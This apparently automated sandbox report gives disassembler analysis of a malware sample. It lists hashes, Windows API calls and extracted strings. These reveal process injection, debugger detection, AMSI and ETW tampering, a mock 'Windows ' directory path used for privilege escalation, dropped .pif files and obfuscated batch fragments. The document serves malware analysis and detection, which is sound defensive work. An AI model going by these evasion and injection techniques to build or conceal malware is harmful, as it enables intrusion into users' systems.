Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: 2269f616aa3a460ff82f95782896d25274a4b9bed2d71b376a8225510d85c1db
Instruction ID: 140242833b376edeb60f710eec7a75461baa20b0cace5d4e8d7d49ca557471f8
Opcode Fuzzy Hash: 2269f616aa3a460ff82f95782896d25274a4b9bed2d71b376a8225510d85c1db
Instruction Fuzzy Hash: 6A018C75600209AFEB10EFA8D861FAEB7EEEB48708F414620F508D7600C670AD15DB64

Function 02CA7CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA8088,?,?,00000000,?,02CA79FE,ntdll,00000000,00000000,02CA7A43,?,?,00000000), ref: 02CA8056
Part of subcall function 02CA8018: GetModuleHandleA.KERNELBASE(?), ref: 02CA806A

Part of subcall function 02CA80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA8148,?,?,00000000,00000000,?,02CA8061,00000000,KernelBASE,00000000,00000000,02CA8088), ref: 02CA810D
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA8113
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(?,?), ref: 02CA8125

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7D6C

Strings

yromeMlautriVetirW, xrefs: 02CA7D13
Ntdll, xrefs: 02CA7D43

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: 105612631d7eb1b83157c69a6162a96c2f082a075d06f71ae75f87a0fb2035b0
Instruction ID: 2fa78e2eba88c14ef13e420768db38e355314426bbf5f99e02c3da7100270df7
Opcode Fuzzy Hash: 105612631d7eb1b83157c69a6162a96c2f082a075d06f71ae75f87a0fb2035b0
Instruction Fuzzy Hash: C4019274A00209AFDB50EFA8D865E9FB7EDFB4C704F514461B508D3680C670A919DF60

Function 02CA84BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA8088,?,?,00000000,?,02CA79FE,ntdll,00000000,00000000,02CA7A43,?,?,00000000), ref: 02CA8056
Part of subcall function 02CA8018: GetModuleHandleA.KERNELBASE(?), ref: 02CA806A

Part of subcall function 02CA80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA8148,?,?,00000000,00000000,?,02CA8061,00000000,KernelBASE,00000000,00000000,02CA8088), ref: 02CA810D
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA8113
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(?,?), ref: 02CA8125

NtUnmapViewOfSection.NTDLL(?,?), ref: 02CA8521

Strings

noitceSfOweiVpamnUtN, xrefs: 02CA84D7
ntdll, xrefs: 02CA8504

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: 1e2d1290ab925a1a3ebfb90c90267be6735c4e95cf1632f9af9163ca00e16b49
Instruction ID: 4f41e3af7e50ad49e88b5e1ee2b9db2ac87abbfd4c4328962d1d5eb4718b5f53
Opcode Fuzzy Hash: 1e2d1290ab925a1a3ebfb90c90267be6735c4e95cf1632f9af9163ca00e16b49
Instruction Fuzzy Hash: A601A274644209AFEF14EFA4D865F5EB7AEEB49718F518920B508D7600CA70A905EB60

Function 02CAD9E8 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL(?,?), ref: 02CADA64
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADAB6), ref: 02CADA7A
NtDeleteFile.NTDLL(?), ref: 02CADA99

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Path$DeleteFileInitNameName_StringUnicode
String ID:
API String ID: 1459852867-0
Opcode ID: 160f249ae71ad4284d9e4f1e874771e823c7ec7ede4e1f51283b39d7a8e2991b
Instruction ID: d128c872e37e3e88ac2b6a763b85b81c9529bf99858fc77c9a3a47d9386678e4
Opcode Fuzzy Hash: 160f249ae71ad4284d9e4f1e874771e823c7ec7ede4e1f51283b39d7a8e2991b
Instruction Fuzzy Hash: E5016275988349AEEF05E7A0C961BCD77BDAB44708F5040A2E203E6481DA74AF05DB21

Function 02CADA3C Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02C94ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C94EDA

RtlInitUnicodeString.NTDLL(?,?), ref: 02CADA64
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADAB6), ref: 02CADA7A
NtDeleteFile.NTDLL(?), ref: 02CADA99

Part of subcall function 02C94C0C: SysFreeString.OLEAUT32(02CAE948), ref: 02C94C1A

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 1694942484-0
Opcode ID: 3a1dd34f2980e77aa5963b4b5bb69b0fda0b01696d306a22671137054ebbd81f
Instruction ID: c5d1760c7a5fabef8b726e2d10c6cfc73e973a342b43c00c951d281ee1b89807
Opcode Fuzzy Hash: 3a1dd34f2980e77aa5963b4b5bb69b0fda0b01696d306a22671137054ebbd81f
Instruction Fuzzy Hash: 61014471944309BADB14EBE0CC61FCEB7BDEB08704F504471E502E6580EB74AF04DA60

Function 02CA6D48 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA6CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02CA6D39,?,?,?,00000000), ref: 02CA6D19

CoCreateInstance.OLE32(?,00000000,00000005,02CA6E2C,00000000,00000000,02CA6DAB,?,00000000,02CA6E1B), ref: 02CA6D97

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 8a26069c3d6f646e4c11b4befee1838dfb0fbcf26116db1738e2e0eeed2b5c94
Instruction ID: 613c74337029182d65d656565dc82b4178bad80a4687797cf75b09513684c5fd
Opcode Fuzzy Hash: 8a26069c3d6f646e4c11b4befee1838dfb0fbcf26116db1738e2e0eeed2b5c94
Instruction Fuzzy Hash: 5601F271608749AEEF15DF64DC3286BBBBDE749B14BA20835F501E2680E6359900D960

Function 02CAEC6C Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,02CBAF99,?,?,?,000002F7,00000000,00000000), ref: 02CAECA6

Part of subcall function 02CA881C: LoadLibraryA.KERNEL32(00000000,00000000,02CA8903), ref: 02CA8850
Part of subcall function 02CA881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02CA8903), ref: 02CA8860
Part of subcall function 02CA881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02CA8879
Part of subcall function 02CA881C: FreeLibrary.KERNEL32(74AE0000,00000000,02CF1388,Function_000065D8,00000004,02CF1398,02CF1388,000186A3,00000040,02CF139C,74AE0000,00000000,00000000,00000000,00000000,02CA8903), ref: 02CA88E3

Part of subcall function 02CAEB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02CAEF90,UacInitialize,02CF137C,02CBAFD0,UacScan,02CF137C,02CBAFD0,ScanBuffer,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,ScanString), ref: 02CAEB92
Part of subcall function 02CAEB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02CAEBA4

Part of subcall function 02CAEBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02CAEBF8
Part of subcall function 02CAEBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02CAEC0A
Part of subcall function 02CAEBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CAEC21

Part of subcall function 02C97E10: GetFileAttributesA.KERNEL32(00000000,?,02CAF8C4,ScanString,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,ScanString,02CF137C,02CBAFD0,UacScan,02CF137C,02CBAFD0,UacInitialize), ref: 02C97E1B

Part of subcall function 02C9C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DE58C8,?,02CAFBF6,ScanBuffer,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,ScanBuffer,02CF137C,02CBAFD0,OpenSession), ref: 02C9C2FB

Part of subcall function 02CADBA8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADC78), ref: 02CADBE3
Part of subcall function 02CADBA8: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02CADC78), ref: 02CADC13
Part of subcall function 02CADBA8: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02CADC28
Part of subcall function 02CADBA8: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02CADC54
Part of subcall function 02CADBA8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02CADC5D

Part of subcall function 02C97E34: GetFileAttributesA.KERNEL32(00000000,?,02CB2A41,ScanString,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,ScanBuffer,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,Initialize), ref: 02C97E3F

Part of subcall function 02C97FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,02CB2BDF,OpenSession,02CF137C,02CBAFD0,ScanString,02CF137C,02CBAFD0,Initialize,02CF137C,02CBAFD0,ScanString,02CF137C,02CBAFD0), ref: 02C97FD5

Part of subcall function 02CADAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADB96), ref: 02CADB03
Part of subcall function 02CADAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CADB3D
Part of subcall function 02CADAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CADB6A
Part of subcall function 02CADAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CADB73

Part of subcall function 02CA8798: LoadLibraryW.KERNEL32(bcrypt,?,00000864,00000000,02CF13A4,02CAA3BF,ScanString,02CF13A4,02CAA774,ScanBuffer,02CF13A4,02CAA774,Initialize,02CF13A4,02CAA774,UacScan), ref: 02CA87AC
Part of subcall function 02CA8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA87C6
Part of subcall function 02CA8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000864,00000000,02CF13A4,02CAA3BF,ScanString,02CF13A4,02CAA774,ScanBuffer,02CF13A4,02CAA774,Initialize), ref: 02CA8802

Part of subcall function 02CA8704: LoadLibraryW.KERNEL32(amsi), ref: 02CA870D
Part of subcall function 02CA8704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02CA876C

Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,ScanBuffer,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,02CBB328), ref: 02CB49AF

Part of subcall function 02CADA3C: RtlInitUnicodeString.NTDLL(?,?), ref: 02CADA64
Part of subcall function 02CADA3C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADAB6), ref: 02CADA7A
Part of subcall function 02CADA3C: NtDeleteFile.NTDLL(?), ref: 02CADA99

MoveFileA.KERNEL32(00000000,00000000), ref: 02CB4BAF
MoveFileA.KERNEL32(00000000,00000000), ref: 02CB4C05

Strings

DlpGetWebSiteAccess, xrefs: 02CB9C09
CreateProcessW, xrefs: 02CBA12F
NtAlertResumeThread, xrefs: 02CB9D34
EnumServicesStatusW, xrefs: 02CBA0E4
NtWriteVirtualMemory, xrefs: 02CBA7D2
FX.c, xrefs: 02CB46F3
NtMapViewOfSection, xrefs: 02CBA6A0
sppwmi, xrefs: 02CBA51F
BCryptQueryProviderRegistration, xrefs: 02CAF381
SLGatherMigrationBlob, xrefs: 02CBA53B
GZmMS1j, xrefs: 02CAECB4
NtDeviceIoControlFile, xrefs: 02CBA0A8
WintrustAddActionID, xrefs: 02CAF0DB
sppc, xrefs: 02CB95A9, 02CB95DC, 02CB960F, 02CB9642, 02CBA552, 02CBA585
CreateProcessAsUserW, xrefs: 02CBA14D, 02CBA16B
TrustOpenStores, xrefs: 02CAF0A8
HotKey=, xrefs: 02CB6629
NtAccessCheck, xrefs: 02CBA739
LdrGetProcedureAddress, xrefs: 02CBA79F
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02CAFE2F
@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%, xrefs: 02CB4846
C:\Users\Public\, xrefs: 02CB317B, 02CB54C8, 02CB673B
http, xrefs: 02CB15CD
RtlAllocateHeap, xrefs: 02CB9D67, 02CB9DCD
NtOpenSection, xrefs: 02CBA63A
mssip32, xrefs: 02CAF250, 02CAF283, 02CAF2B6, 02CB98B5
MiniDumpReadDumpStream, xrefs: 02CB89AA
RetailTracerEnable, xrefs: 02CB97D2
SLLoadApplicationPolicies, xrefs: 02CB962B
NtGetWriteWatch, xrefs: 02CBA5A1
Kernel32, xrefs: 02CBA125, 02CBA134, 02CBA170
ScanString, xrefs: 02CAEDA3, 02CAF032, 02CAF147, 02CAF2D8, 02CAF469, 02CAF6F2, 02CAF833, 02CAFDB9, 02CB09D1, 02CB0B6D, 02CB0FA9, 02CB11C4, 02CB1240, 02CB155D, 02CB1883, 02CB1B4C, 02CB1F89, 02CB23BA, 02CB25CA, 02CB2680, 02CB29AF, 02CB2AD1, 02CB2D92, 02CB31DD, 02CB3CD5, 02CB414B, 02CB4340, 02CB4CF8, 02CB4E92, 02CB51D7, 02CB559B, 02CB5C3A, 02CB6420, 02CB6597, 02CB664F, 02CB6CBC, 02CB7156, 02CB75BD, 02CB7BE0, 02CB8687, 02CB8A79, 02CB8E62, 02CB921E, 02CB951C, 02CB98D7, 02CB9CBE, 02CB9EB5, 02CBA45F
WriteVirtualMemory, xrefs: 02CBA2C8
SLGetSLIDList, xrefs: 02CB95C5
NtQuerySystemInformation, xrefs: 02CBA099
CreateProcessWithLogonW, xrefs: 02CBA15C
GetProcessMemoryInfo, xrefs: 02CB986B
smartscreenps, xrefs: 02CAF4F6, 02CAF529, 02CAF55C
RtlCreateQueryDebugBuffer, xrefs: 02CB9E00
Initialize, xrefs: 02CAED3F, 02CAFCC1, 02CAFE55, 02CAFFF3, 02CB0199, 02CB044E, 02CB0AF1, 02CB0F2D, 02CB13D7, 02CB14E1, 02CB1BC8, 02CB1EFA, 02CB221A, 02CB254E, 02CB26FC, 02CB2A55, 02CB2E0E, 02CB4FB6, 02CB534B, 02CB5747, 02CB590C, 02CB5B78, 02CB5CB6, 02CB5EBB, 02CB6E30, 02CB7AE8, 02CB8AF5, 02CB96E0, 02CB9A7E, 02CB9FAD, 02CBA367, 02CBA8B3
.url, xrefs: 02CB54D3
endpointdlp, xrefs: 02CB9B87, 02CB9BBA, 02CB9BED, 02CB9C20
CreateProcessAsUserA, xrefs: 02CBA13E
tquery, xrefs: 02CB97E9
SLGetEncryptedPIDEx, xrefs: 02CBA56E
CreateProcessA, xrefs: 02CBA120
BCryptVerifySignature, xrefs: 02CAF34E, 02CB99C9
UacScan, xrefs: 02CAEECF, 02CAF57E, 02CAF676, 02CAFC45, 02CB082B, 02CB0E09, 02CB176B, 02CB1E7E, 02CB308F, 02CB3259, 02CB33BA, 02CB3533, 02CB36B6, 02CB3887, 02CB3965, 02CB3AF3, 02CB3FFF, 02CB43BC, 02CB45F1, 02CB52CF, 02CB583F, 02CB5A04, 02CB5D32, 02CB5E3F, 02CB609D, 02CB6195, 02CB6D38, 02CB70DA, 02CB72F1, 02CB7484, 02CB76D8, 02CB7B64, 02CB7CED, 02CB7E46, 02CB7FEC, 02CB8179, 02CB830D, 02CB848C, 02CB8703, 02CB8B71, 02CB8D8B, 02CB8F6C, 02CB90E0, 02CB9316, 02CBA186
URL=file:", xrefs: 02CB649F
kernel32, xrefs: 02CBA213, 02CBA246, 02CBA279, 02CBA2AC, 02CBA2DF, 02CBA312, 02CBA345
sys.thgiseurt, xrefs: 02CB3EC4
NtOpenProcess, xrefs: 02CB89D2
C:\\Windows \\SysWOW64\\, xrefs: 02CB3AC6, 02CB3EDA
ntdll, xrefs: 02CB8973, 02CB89C3, 02CB89D7, 02CB9D4B, 02CB9D7E, 02CB9DB1, 02CB9DE4, 02CB9E17, 02CBA5B8, 02CBA5EB, 02CBA61E, 02CBA651, 02CBA684, 02CBA6B7, 02CBA6EA, 02CBA71D, 02CBA750, 02CBA783, 02CBA7B6, 02CBA7E9, 02CBA81C, 02CBA84F, 02CBA882
DlpCheckIsCloudSyncApp, xrefs: 02CB9BA3
lld.SLITUTEN, xrefs: 02CB3AB0
OpenSession, xrefs: 02CAECDB, 02CAEE07, 02CAF7B7, 02CAF8D8, 02CAF9E5, 02CAFAFD, 02CAFED1, 02CB006F, 02CB0215, 02CB0335, 02CB04CA, 02CB05C2, 02CB07AF, 02CB0955, 02CB0C83, 02CB0EB1, 02CB1025, 02CB1148, 02CB12C6, 02CB166C, 02CB16EF, 02CB1807, 02CB191F, 02CB1A2B, 02CB1C49, 02CB1D66, 02CB2005, 02CB2081, 02CB2296, 02CB2436, 02CB2778, 02CB2933, 02CB2B4D, 02CB2C67, 02CB2F97, 02CB3436, 02CB35AF, 02CB3732, 02CB3B6F, 02CB3DCD, 02CB3F07, 02CB4243, 02CB448B, 02CB466D, 02CB4741, 02CB48A7, 02CB4A3C, 02CB4D74, 02CB4F0E, 02CB50AE, 02CB5253, 02CB53C7, 02CB5617, 02CB56CB, 02CB5988, 02CB5A80, 02CB5F37, 02CB6211, 02CB6385, 02CB651B, 02CB66CB, 02CB6DB4, 02CB6FB9, 02CB71D2, 02CB7275, 02CB7408, 02CB77D0, 02CB7A6C, 02CB7D69, 02CB7EC2, 02CB8068, 02CB81F5, 02CB8389, 02CB8508, 02CB860B, 02CB877F, 02CB89FD, 02CB8BED, 02CB8EDE, 02CB9064, 02CB929A, 02CB94A0, 02CB9664, 02CB9953, 02CB9A02, 02CB9C42, 02CB9E39, 02CB9F31, 02CBA3E3, 02CBA9AB
C:\Users\Public\aken.pif, xrefs: 02CB4B49
MiniDumpWriteDump, xrefs: 02CB8996
advapi32, xrefs: 02CB8987
CryptSIPVerifyIndirectData, xrefs: 02CAF26C, 02CB989E
ScanBuffer, xrefs: 02CAEE6B, 02CAF1C3, 02CAF3ED, 02CAF954, 02CAFA61, 02CAFB79, 02CAFF4D, 02CB00EB, 02CB0291, 02CB03B1, 02CB0546, 02CB063E, 02CB08A7, 02CB0A4D, 02CB0BE9, 02CB0CFF, 02CB0D8D, 02CB10A1, 02CB1342, 02CB1453, 02CB15F0, 02CB199B, 02CB1AA7, 02CB1CC5, 02CB1DE2, 02CB20FD, 02CB219E, 02CB2312, 02CB24D2, 02CB27F4, 02CB2BEB, 02CB2E8A, 02CB2F1B, 02CB32D5, 02CB34B7, 02CB362B, 02CB37AE, 02CB382A, 02CB39E1, 02CB3BEB, 02CB3E49, 02CB407B, 02CB42BF, 02CB4507, 02CB47BD, 02CB4923, 02CB4AB8, 02CB4DF0, 02CB512A, 02CB5443, 02CB57C3, 02CB5AFC, 02CB5DAE, 02CB5FB3, 02CB6119, 02CB628D, 02CB6309, 02CB6EAC, 02CB6F3D, 02CB736D, 02CB7500, 02CB765C, 02CB7754, 02CB7C71, 02CB7F3E, 02CB80E4, 02CB8271, 02CB8405, 02CB8584, 02CB87FB, 02CB88F3, 02CB8D0F, 02CB8FE8, 02CB915C, 02CB9392, 02CB9424, 02CB975C, 02CB9AFA, 02CBA029, 02CBA92F
EnumServicesStatusA, xrefs: 02CBA0D5
SLGetGenuineInformation, xrefs: 02CB9592
FlushInstructionCache, xrefs: 02CBA2FB
NtSetSecurityObject, xrefs: 02CB89BE
EtwEventWriteEx, xrefs: 02CBA838
C:\Users\Public\alpha.pif, xrefs: 02CB4B2E
psapi, xrefs: 02CB9882
NEO.c, xrefs: 02CB443D
ieproxy, xrefs: 02CAEFB9, 02CAEFE0, 02CAF010
NtQueryInformationThread, xrefs: 02CBA607
C:\\Users\\Public\\Libraries\\, xrefs: 02CB4B5E, 02CB4BB4, 02CB58AF
SetUnhandledExceptionFilter, xrefs: 02CBA32E
psapi, xrefs: 02CBA116
EnumServicesStatusExA, xrefs: 02CBA0F3
UacUninitialize, xrefs: 02CB2D16, 02CB3013, 02CB310B, 02CB38E9, 02CB3F83
VirtualAllocEx, xrefs: 02CBA22F
dbgcore, xrefs: 02CB899B, 02CB89AF
WinHttp.WinHttpRequest.5.1, xrefs: 02CB17E1
NtOpenObjectAuditAlarm, xrefs: 02CB896E
GET, xrefs: 02CB18FA
NtReadVirtualMemory, xrefs: 02CBA6D3
UacInitialize, xrefs: 02CAEF33, 02CAF5FA, 02CAFD3D, 02CB3D51, 02CB41C7, 02CB49C0, 02CB4C7C, 02CB5032, 02CB551F, 02CB7035, 02CB8877, 02CB8C93
SxTracerGetThreadContextDebug, xrefs: 02CB9805, 02CBA4D5
LdrLoadDll, xrefs: 02CBA76C
spp, xrefs: 02CB981C, 02CB984F, 02CBA4EC
NtQueryDirectoryFile, xrefs: 02CBA0B7
NtOpenFile, xrefs: 02CBA805
SLIsGenuineLocalEx, xrefs: 02CB95F8
NtCreateSection, xrefs: 02CBA66D
[InternetShortcut], xrefs: 02CB6490
NtQueryVirtualMemory, xrefs: 02CBA5D4
VirtualAlloc, xrefs: 02CBA1FC
@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%, xrefs: 02CB3359
C:\\Windows \\SysWOW64\\svchost.exe, xrefs: 02CB36A0
C:\Windows\System32\, xrefs: 02CAF8AF, 02CB70B3, 02CB7DFB
EnumServicesStatusExW, xrefs: 02CBA102
Advapi, xrefs: 02CBA0DA, 02CBA0E9, 02CBA0F8, 02CBA107, 02CBA143, 02CBA152, 02CBA161
EtwEventWrite, xrefs: 02CBA86B
wintrust, xrefs: 02CAF0BF, 02CAF0F2, 02CAF125
GetProxyDllInfo, xrefs: 02CAEFCF
Ntdll, xrefs: 02CBA09E, 02CBA0AD, 02CBA0BC, 02CBA0CB
DlpGetArchiveFileTraceInfo, xrefs: 02CB9BD6
RtlQueryProcessDebugInformation, xrefs: 02CBA0C6
CryptSIPGetSignedDataMsg, xrefs: 02CAF29F
NtWaitForSingleObject, xrefs: 02CB9D9A
VirtualProtect, xrefs: 02CBA262
OpenProcess, xrefs: 02CBA295
CryptSIPGetInfo, xrefs: 02CAF239
DllGetClassObject, xrefs: 02CAEFA8, 02CAF4DF, 02CB9838, 02CBA508
@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or, xrefs: 02CB4590
DllGetActivationFactory, xrefs: 02CAF512
DllRegisterServer, xrefs: 02CAEFF9, 02CAF545
NtQuerySecurityObject, xrefs: 02CBA706
BCryptRegisterProvider, xrefs: 02CAF3B4
I_QueryTagInformation, xrefs: 02CB8982
DlpNotifyPreDragDrop, xrefs: 02CB9B70
IconIndex=, xrefs: 02CB64F5
EnumProcessModules, xrefs: 02CBA111
bcrypt, xrefs: 02CAF365, 02CAF398, 02CAF3CB, 02CB99E0
FindCertsByIssuer, xrefs: 02CAF10E

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
